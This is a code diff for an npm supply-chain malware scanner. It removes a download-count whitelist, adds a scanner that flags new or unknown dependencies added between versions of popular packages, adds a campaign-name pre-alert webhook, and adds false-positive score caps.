-            // Dependency diff check: detect supply-chain injection on TRUSTED packages
-            // (e.g., axios 1.14.0 → 1.14.1 adding unknown plain-crypto-js, 2026-03-30)
-            const trustedFindings = await checkTrustedDepDiff(name, version);
-            const hasCriticalDepFinding = trustedFindings.some(f => f.severity === 'CRITICAL');
-
-            if (hasCriticalDepFinding) {
-              // CRITICAL: unknown/new dependency — bypass TRUSTED, route to full scan + sandbox
-              console.log(`[MONITOR] TRUSTED BYPASS: ${name}@${version} — new unknown dependency detected, routing to full scan`);
-              result.threats.push(...trustedFindings);
-              for (const f of trustedFindings) {
-                if (f.severity === 'CRITICAL') result.summary.critical = (result.summary.critical || 0) + 1;
-                else if (f.severity === 'HIGH') result.summary.high = (result.summary.high || 0) + 1;
-              }
-              // Fall through to full classification below (do NOT return)
-            } else {
-              // No CRITICAL dep findings — normal TRUSTED skip (log HIGH findings if any)
-              for (const f of trustedFindings) {
-                console.log(`[MONITOR] TRUSTED dep change: ${f.message}`);
-              }
-              stats.scanned++;
-              const elapsed = Date.now() - startTime;
-              stats.totalTimeMs += elapsed;
-              stats.clean++;
-              console.log(`[MONITOR] TRUSTED (popular): ${name}@${version} (${Math.round(downloads / 1000)}k downloads/week, ${counts.join(', ')})`);
-              updateScanStats('clean');
-              recordTrainingSample(result, { name, version, ecosystem, label: 'clean', registryMeta: meta, unpackedSize: meta.unpackedSize, npmRegistryMeta, fileCountTotal, hasTests });
-              return { sandboxResult: null, staticClean: true };
-            }
-          }
-        }
+        // No popularity-based skip here. The TRUSTED (popular) shortcut that used
+        // to live at this point was a whitelist-by-downloads — CLAUDE.md forbids
+        // FP-reducing whitelists, and the Shai-Hulud wave-2 ATO attacks of May 2026
+        // proved that popular packages are precisely the prime target for ATO.
+        // Downstream attenuation handles the FP load via computeReputationFactor()
+        // and the graduated webhook threshold (webhook.js:83-87) — popular packages
+        // need a higher static score to fire a webhook, but they remain visible in
+        // the pipeline (sandbox, persisted detections, training samples) the same
+        // way every other package is. The supply-chain dep-diff check that the
+        // old block used as bypass logic now runs as a first-class scanner
+        // (src/scanner/trusted-dep-diff.js, wired in via executor.js); its findings
+        // arrive in result.threats before this point, so isSuspectClassification
+        // and the reputation bypass for HIGH_CONFIDENCE_MALICE_TYPES take the
+        // package straight to tier 1a + mandatory sandbox + webhook.
 
         const classification = isSuspectClassification(result);
         if (!classification.suspect) {

package/src/monitor/webhook.js

@@ -187,6 +187,41 @@ async function sendIOCPreAlert(name, version) {
   await sendWebhook(url, payload, { rawPayload: true });
 }
 
+/**
+ * Layer 1b: Send immediate pre-alert webhook when a package name matches an
+ * active-campaign pattern (e.g. `did-NNNN` in May 2026). Fires BEFORE tarball
+ * download \u2014 IOC lists are eventually-consistent and lag the campaign by
+ * hours to days, so name-pattern watch is the only signal available in real
+ * time while the campaign is in flight.
+ * @param {string} name - Package name that matched the campaign pattern
+ * @param {string} campaign - Short campaign label (e.g. 'did-NNNN')
+ */
+async function sendCampaignPreAlert(name, campaign) {
+  const url = getWebhookUrl();
+  if (!url) return;
+
+  const npmLink = `https://www.npmjs.com/package/${encodeURIComponent(name)}`;
+
+  const payload = {
+    embeds: [{
+      title: '\u26a0\ufe0f CAMPAIGN PRE-ALERT \u2014 Suspected Active Campaign',
+      color: 0xe67e22,
+      fields: [
+        { name: 'Package', value: `[${name}](${npmLink})`, inline: true },
+        { name: 'Source', value: `Name pattern: ${campaign}`, inline: true },
+        { name: 'Detection', value: 'Changes stream pre-scan', inline: true },
+        { name: 'Status', value: 'Suspected campaign publication \u2014 not yet confirmed malicious. Full scan queued; treat as suspect until verdict lands.', inline: false }
+      ],
+      footer: {
+        text: `MUAD'DIB Campaign Pre-Alert | ${new Date().toISOString().replace('T', ' ').replace(/\.\d+Z$/, ' UTC')}`
+      },
+      timestamp: new Date().toISOString()
+    }]
+  };
+
+  await sendWebhook(url, payload, { rawPayload: true });
+}
+
 /**
  * Check if a specific package@version matches a versioned IOC entry.
  * Returns the matching IOC entry or null.
@@ -1172,6 +1207,7 @@ module.exports = {
   shouldSendWebhook,
   buildMonitorWebhookPayload,
   sendIOCPreAlert,
+  sendCampaignPreAlert,
   matchVersionedIOC,
   computeRiskLevel,
   computeRiskScore,

package/src/pipeline/executor.js

@@ -10,6 +10,7 @@ const { scanIocStrings } = require('../scanner/ioc-strings.js');
 const { scanAntiForensic } = require('../scanner/anti-forensic.js');
 const { scanStubPackage } = require('../scanner/stub-package.js');
 const { scanMonorepo } = require('../scanner/monorepo.js');
+const { scanTrustedDepDiff } = require('../scanner/trusted-dep-diff.js');
 const { analyzeDataFlow } = require('../scanner/dataflow.js');
 const { scanTyposquatting, findPyPITyposquatMatch } = require('../scanner/typosquat.js');
 const { scanGitHubActions } = require('../scanner/github-actions.js');
@@ -201,7 +202,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     'scanDependencies', 'scanHashes', 'analyzeDataFlow', 'scanTyposquatting',
     'scanGitHubActions', 'matchPythonIOCs', 'checkPyPITyposquatting',
     'scanEntropy', 'scanAIConfig', 'scanIocStrings', 'scanAntiForensic',
-    'scanStubPackage', 'scanMonorepo'
+    'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff'
   ];
 
   const settledResults = await Promise.allSettled([
@@ -221,7 +222,13 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     yieldThen(() => scanIocStrings(targetPath)),
     withTimeout(() => scanAntiForensic(targetPath), 'scanAntiForensic'),
     yieldThen(() => scanStubPackage(targetPath)),
-    yieldThen(() => scanMonorepo(targetPath))
+    yieldThen(() => scanMonorepo(targetPath)),
+    // Opt-in scanner — short-circuits to [] unless options.trustedDepDiff or
+    // options.monitorMode is set. CLI runs without flags pay no cost (no I/O).
+    // Wrapped in withTimeout as defense in depth: scanner has its own 10s + 5s × N
+    // internal timeouts, but a registry slowdown with many added deps could exceed
+    // the static-scan budget without this cap.
+    withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff')
   ]);
 
   // Extract results: use empty array for rejected scanners, log errors
@@ -250,7 +257,8 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     iocStringThreats,
     antiForensicThreats,
     stubPackageThreats,
-    monorepoThreats
+    monorepoThreats,
+    trustedDepDiffThreats
   ] = scanResult;
 
   // Emit warning if file count cap was hit + quick-scan overflow files
@@ -330,6 +338,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     ...antiForensicThreats,
     ...stubPackageThreats,
     ...monorepoThreats,
+    ...trustedDepDiffThreats,
     ...crossFileFlows.filter(f => f && f.sourceFile && f.sinkFile).map(f => ({
       type: f.type,
       severity: f.severity,

package/src/pipeline/scan-worker.js

@@ -23,7 +23,12 @@ const { run } = require('../index.js');
 
 (async () => {
   try {
-    const result = await run(workerData.extractedDir, { _capture: true });
+    // scanContext (optional) carries monitor-side info that opt-in scanners need
+    // (e.g. trusted-dep-diff requires package name + version to query the registry).
+    // It is spread INTO the pipeline options, but `_capture: true` always wins so
+    // the worker keeps returning the result object — never prints.
+    const scanContext = workerData.scanContext || {};
+    const result = await run(workerData.extractedDir, { ...scanContext, _capture: true });
     parentPort.postMessage({ type: 'result', data: result });
   } catch (err) {
     parentPort.postMessage({ type: 'error', message: err.message || String(err) });

package/src/scanner/trusted-dep-diff.js

@@ -0,0 +1,205 @@
+'use strict';
+
+/**
+ * Trusted dep-diff scanner — detects supply-chain injection via NEW dependencies
+ * added between two adjacent published versions of an npm package.
+ *
+ * Threat model: a compromised maintainer account publishes a patch bump that
+ * silently introduces a fresh (or unknown-aged) dependency carrying the actual
+ * payload. Reference incident: axios 1.14.0 → 1.14.1 adding `plain-crypto-js`
+ * on 2026-03-30. The hostile dep is short-aged and unrecognised, but the host
+ * package itself is reputable, so popularity-based filters miss it.
+ *
+ * Opt-in by design: the scanner needs registry I/O for the previous version's
+ * dependency list, which is meaningless for offline CLI audits of a frozen
+ * node_modules. It only runs when explicitly enabled via
+ *   options.trustedDepDiff === true  OR
+ *   options.monitorMode === true
+ * The monitor pipeline sets both via the worker thread context.
+ *
+ * Findings emitted (rule IDs already registered in src/rules/index.js:2598-2621):
+ *   - trusted_new_unknown_dependency  (CRITICAL) — added dep < 7d old OR age unknown
+ *   - trusted_new_dependency          (HIGH)     — added dep ≥ 7d old
+ *
+ * Both types are in HIGH_CONFIDENCE_MALICE_TYPES (classify.js:60), which means
+ * downstream reputation attenuation is bypassed — the finding's severity reaches
+ * the webhook decision uncapped.
+ */
+
+const fs = require('fs');
+const path = require('path');
+const https = require('https');
+
+const TRUSTED_DEP_AGE_THRESHOLD_MS = 7 * 24 * 60 * 60 * 1000; // 7 days
+
+const PACKUMENT_TIMEOUT_MS = 10_000;
+const DEP_AGE_TIMEOUT_MS = 5_000;
+
+/**
+ * Minimal HTTPS GET with follow-redirects and timeout.
+ * Local copy (not shared with monitor/ingestion.js) to keep the scanner
+ * self-contained — the monitor module pulls this scanner, not the reverse.
+ */
+function httpsGet(url, timeoutMs = 30_000) {
+  return new Promise((resolve, reject) => {
+    const req = https.get(url, { timeout: timeoutMs }, (res) => {
+      if (res.statusCode === 301 || res.statusCode === 302) {
+        res.resume();
+        const location = res.headers.location;
+        if (!location) return reject(new Error(`Redirect without Location for ${url}`));
+        return httpsGet(location, timeoutMs).then(resolve, reject);
+      }
+      if (res.statusCode < 200 || res.statusCode >= 300) {
+        res.resume();
+        return reject(new Error(`HTTP ${res.statusCode} for ${url}`));
+      }
+      const chunks = [];
+      res.on('data', (chunk) => chunks.push(chunk));
+      res.on('end', () => resolve(Buffer.concat(chunks).toString('utf8')));
+      res.on('error', reject);
+    });
+    req.on('error', reject);
+    req.on('timeout', () => {
+      req.destroy();
+      reject(new Error(`Timeout for ${url}`));
+    });
+  });
+}
+
+/**
+ * Core dep-diff logic — extracted verbatim from monitor/ingestion.js#checkTrustedDepDiff
+ * with no behavioural change: same findings shape, same rule_ids, same severity
+ * mapping, same 7-day age cutoff. Tests covering the original implementation
+ * (tests/integration/monitor.test.js:8929-9067) cover this directly via the
+ * `checkTrustedDepDiff` alias export below.
+ *
+ * @param {string} name - Package name
+ * @param {string} newVersion - Newly published version
+ * @returns {Promise<Array>} findings (empty on error or no new deps)
+ */
+async function checkDepDiff(name, newVersion) {
+  const findings = [];
+  try {
+    const body = await httpsGet(`https://registry.npmjs.org/${encodeURIComponent(name)}`, PACKUMENT_TIMEOUT_MS);
+    const packument = JSON.parse(body);
+
+    if (!packument.versions || !packument.time) return findings;
+
+    // Sort versions by publish time (not semver — handles prereleases correctly)
+    const timeMap = packument.time;
+    const versionKeys = Object.keys(packument.versions)
+      .filter(v => timeMap[v])
+      .sort((a, b) => new Date(timeMap[a]) - new Date(timeMap[b]));
+
+    const newIdx = versionKeys.indexOf(newVersion);
+    if (newIdx <= 0) return findings; // First version or not found
+
+    const prevVersion = versionKeys[newIdx - 1];
+
+    const prevDeps = (packument.versions[prevVersion] && packument.versions[prevVersion].dependencies) || {};
+    const newDeps = (packument.versions[newVersion] && packument.versions[newVersion].dependencies) || {};
+
+    const addedDeps = Object.keys(newDeps).filter(dep => !(dep in prevDeps));
+    if (addedDeps.length === 0) return findings;
+
+    console.log(`[SCANNER] trusted-dep-diff: ${name} ${prevVersion} → ${newVersion}: +${addedDeps.length} new dep(s): ${addedDeps.join(', ')}`);
+
+    for (const dep of addedDeps) {
+      let ageMs = null;
+      try {
+        const depBody = await httpsGet(`https://registry.npmjs.org/${encodeURIComponent(dep)}`, DEP_AGE_TIMEOUT_MS);
+        const depData = JSON.parse(depBody);
+        const created = depData.time && depData.time.created;
+        if (created) {
+          ageMs = Date.now() - new Date(created).getTime();
+        }
+      } catch (err) {
+        console.log(`[SCANNER] trusted-dep-diff: could not check age of dependency ${dep}: ${err.message}`);
+      }
+
+      if (ageMs === null || ageMs < TRUSTED_DEP_AGE_THRESHOLD_MS) {
+        const ageDays = ageMs !== null ? Math.floor(ageMs / 86400000) : 'unknown';
+        findings.push({
+          type: 'trusted_new_unknown_dependency',
+          severity: 'CRITICAL',
+          confidence: ageMs === null ? 'medium' : 'high',
+          file: 'package.json',
+          message: `TRUSTED package ${name} added unknown dependency ${dep} (age: ${ageDays}d) in version ${prevVersion} → ${newVersion}`,
+          rule_id: 'MUADDIB-TRUSTED-001',
+          mitre: 'T1195.002',
+          dep,
+          depAgeDays: ageDays,
+          prevVersion,
+          newVersion
+        });
+      } else {
+        const ageDays = Math.floor(ageMs / 86400000);
+        findings.push({
+          type: 'trusted_new_dependency',
+          severity: 'HIGH',
+          confidence: 'medium',
+          file: 'package.json',
+          message: `TRUSTED package ${name} added new dependency ${dep} (age: ${ageDays}d) in version ${prevVersion} → ${newVersion}`,
+          rule_id: 'MUADDIB-TRUSTED-002',
+          mitre: 'T1195.002',
+          dep,
+          depAgeDays: ageDays,
+          prevVersion,
+          newVersion
+        });
+      }
+    }
+
+    return findings;
+  } catch (err) {
+    console.log(`[SCANNER] trusted-dep-diff: check failed for ${name}@${newVersion}: ${err.message}`);
+    return findings;
+  }
+}
+
+/**
+ * Pipeline entry point. Called by src/pipeline/executor.js alongside the other
+ * 17 scanners (Promise.allSettled). Gated by an explicit opt-in option to keep
+ * CLI audits offline-safe.
+ *
+ * @param {string} targetPath - Extracted package directory
+ * @param {object} options    - Pipeline options. Honors:
+ *   - options.trustedDepDiff  - explicit opt-in (preferred)
+ *   - options.monitorMode     - opt-in for the monitor daemon path
+ *   - options.name            - package name override (avoids re-reading package.json)
+ *   - options.version         - version override
+ *   - options.ecosystem       - 'npm' | 'pypi' | ... — scanner is npm-only
+ * @returns {Promise<Array>}   findings array (always — never rejects)
+ */
+async function scanTrustedDepDiff(targetPath, options = {}) {
+  if (!options.trustedDepDiff && !options.monitorMode) return [];
+  if (options.ecosystem && options.ecosystem !== 'npm') return [];
+
+  let name = options.name || null;
+  let version = options.version || null;
+
+  if (!name || !version) {
+    const pkgJsonPath = path.join(targetPath, 'package.json');
+    if (!fs.existsSync(pkgJsonPath)) return [];
+    let pkg;
+    try {
+      pkg = JSON.parse(fs.readFileSync(pkgJsonPath, 'utf8'));
+    } catch {
+      return [];
+    }
+    name = name || pkg.name;
+    version = version || pkg.version;
+  }
+
+  if (!name || !version) return [];
+
+  return await checkDepDiff(name, version);
+}
+
+module.exports = {
+  scanTrustedDepDiff,
+  checkDepDiff,
+  // Backwards-compat alias for existing tests imported from monitor/ingestion.js
+  checkTrustedDepDiff: checkDepDiff,
+  TRUSTED_DEP_AGE_THRESHOLD_MS
+};

package/src/scoring.js

@@ -1485,6 +1485,9 @@ const {
   placeholderAntiDepConfusion,
   mcpServerEnvAccess,
   vendorCliSdk,
+  aiAgentBot,
+  vendorMinifiedBundle,
+  typosquatBenignLifecycle,
 } = require('./ml/feature-extractor.js');
 
 /**
@@ -1519,6 +1522,13 @@ function applyContextualFPCaps(result, pkgMeta) {
   if (bundleWithoutInstallScripts(result, meta)) {
     applied.push({ feature: 'bundle_without_install_scripts', cap: 30 });
   }
+  // F12: vendor minified bundle cascade (>=3 CASCADE_TYPES on a single
+  // bundle file, no lifecycle, no veto) → MAX 25. Targets the v2.11.27
+  // weekly review cluster (@photoroom/ui, @vkontakte/videoplayer-shared).
+  // Tighter than F1 because the cascade is a stronger structural signature.
+  if (vendorMinifiedBundle(result, meta)) {
+    applied.push({ feature: 'vendor_minified_bundle', cap: 25 });
+  }
   // F3: credential destination first-party API → MAX 30
   if (networkDestinationFirstParty(result, meta)) {
     applied.push({ feature: 'network_destination_first_party', cap: 30 });
@@ -1543,10 +1553,22 @@ function applyContextualFPCaps(result, pkgMeta) {
   if (vendorCliSdk(result, meta)) {
     applied.push({ feature: 'vendor_cli_sdk', cap: 35 });
   }
+  // F11: legit AI agent / bot / multi-LLM orchestrator → MAX 35
+  if (aiAgentBot(result, meta)) {
+    applied.push({ feature: 'ai_agent_bot', cap: 35 });
+  }
   // F5: typosquat on scoped package → suppress typosquat points
   if (typosquatScopedPackage(result, meta)) {
     applied.push({ feature: 'typosquat_scoped_package', cap: -1 });
   }
+  // F13: boundary-squat dep + provably benign lifecycle (husky install,
+  // npm run build, patches/apply-patches) → MAX 30. Targets the v2.11.28
+  // weekly review cluster (@doyourjob/gravity-ui-page-constructor,
+  // magmastream, balena-cli, @1d1s/design-system, etc.). Vetoes on any
+  // exfil signal, IOC hit, or Axios UNC1069 dep-usage compound.
+  if (typosquatBenignLifecycle(result, meta)) {
+    applied.push({ feature: 'typosquat_benign_lifecycle', cap: 30 });
+  }
 
   if (applied.length === 0) return applied;